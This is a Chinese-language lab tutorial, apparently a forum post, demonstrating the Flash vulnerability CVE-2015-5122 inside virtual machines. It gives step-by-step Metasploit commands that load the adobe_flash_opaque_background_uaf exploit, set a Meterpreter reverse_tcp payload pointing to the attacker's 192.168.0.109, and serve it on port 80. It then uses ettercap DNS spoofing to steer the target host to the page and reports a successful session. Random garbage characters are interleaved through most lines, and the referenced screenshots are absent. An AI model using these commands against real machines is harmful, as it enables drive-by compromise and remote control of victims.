) g. {% z2 B) Z 二、cve2015-5122漏洞实例演示虚拟机 ' z6 w3 U: c |. h# _
4 a# K4 [! a- Y. Y) C
, x0 Q9 h) Y2 u5 C 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
2 F3 C7 ? Y) u2 ]5 L0 a+ C' }, i , D5 D$ t2 }" o- r9 e6 P u- w
, {& g8 w$ i! _, s9 q0 U2 `4 D- ]; w search cve-2015-5122如图: & c( B6 A# a/ C) K( ~, Z% `) K
' S, L. {2 C' N) T- {* b; `3 H2 v
( B+ n' \$ {1 x
2 t( _3 f2 U8 Y, s8 f / U7 d1 W$ J; I0 o) G+ |
- f: H+ t: q+ N# r 下面我们敲如下命令:
6 L2 P6 e9 N7 w& v , z" ?* n+ j7 [2 N l M8 O. P
/ s( z3 J; Z9 O1 z use exploit/multi/browser/adobe_flash_opaque_background_uaf
" \* z5 }% _1 k. a! j 3 D6 ~, N5 k2 j7 X
- y& }1 ^3 V* w% s1 s3 _- `
set PAYLOAD windows/meterpreter/reverse_tcp
1 |% k" h; e! E9 t' k* i& k
+ g3 I; t j1 u# D* ~* Y& [& I8 F0 [# T K. k4 E. C9 U! r2 I& x
set LHOST 192.168.0.109 ! ?2 e+ |- f o! u( L
# L# H, ]1 j4 s4 F9 H
" Z& A) O; f1 i- j+ f7 H! F
set URIPATH / /*根目录*/ * @/ S4 T8 ?$ S5 a+ D. c2 X
5 A' ~" H2 s, X% c0 E9 C
6 [ A) N9 u- _* [ c2 n. ~ set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
$ e7 W7 G1 W4 ~$ n' c9 F " [& i* o. E+ x' B7 ^) Z! w
# Q- m5 W' s+ s2 ?% n% h. S- K
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
7 u8 a- Q( @+ b3 P9 k: w% a 8 r, ]8 d- Q ~' N, x. @/ _
+ w9 o4 B, e2 X 然后show options如图: # o: U, j. s. b+ K7 u
# o# F4 _8 [* P7 p2 V( K1 J+ h
2 D- i7 M) q' D
& m# G* I! O( I* s8 M
! U0 ^9 _& w" Y
" t, N% K9 _6 L+ T; B 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
& r; N. C; \! g& ]
0 ^: ]0 i3 ?! Y- F& s) l ) |2 D, u; f) l; V
& r# M2 N2 o8 w: n7 i
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 ( J, A' M7 ^& W4 t9 J
?+ y/ w1 K: w9 B- Y% O% a8 O& Q" e$ s- r
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
B) O A; n5 E! h Z ) `; J; Z0 i6 ]! L8 g! J: m, ]
/ l. k: O" q2 g" n9 h0 L
6 |9 S( e) T9 u: R, l
5 b. U9 [/ q; ~8 _
: {* j! P% e: M1 `& R! B6 _ 成功了,这时候我们断开ettercap,如图: 6 I7 Q5 k4 C+ n/ Y! J3 _
0 e0 O5 K. c( w: n& B) r5 |! r( \' a& K8 F& \4 j( O* @
$ U- i+ y; _! ]4 w B! b; u
- ]: v+ O6 h0 D. z0 L' u8 e! o. W# C! \4 O1 |
Screenshot如图:
$ z5 ?7 m# d4 w
" C" b2 S) v. s) ^. F# W6 i! \1 V/ A6 m4 z# m: H
. U) R( ?! [6 |2 _$ z
, H3 j6 }* S2 a
+ a0 {) {* L1 T# a. }, L
) p" D. f9 N) W, X3 L) E |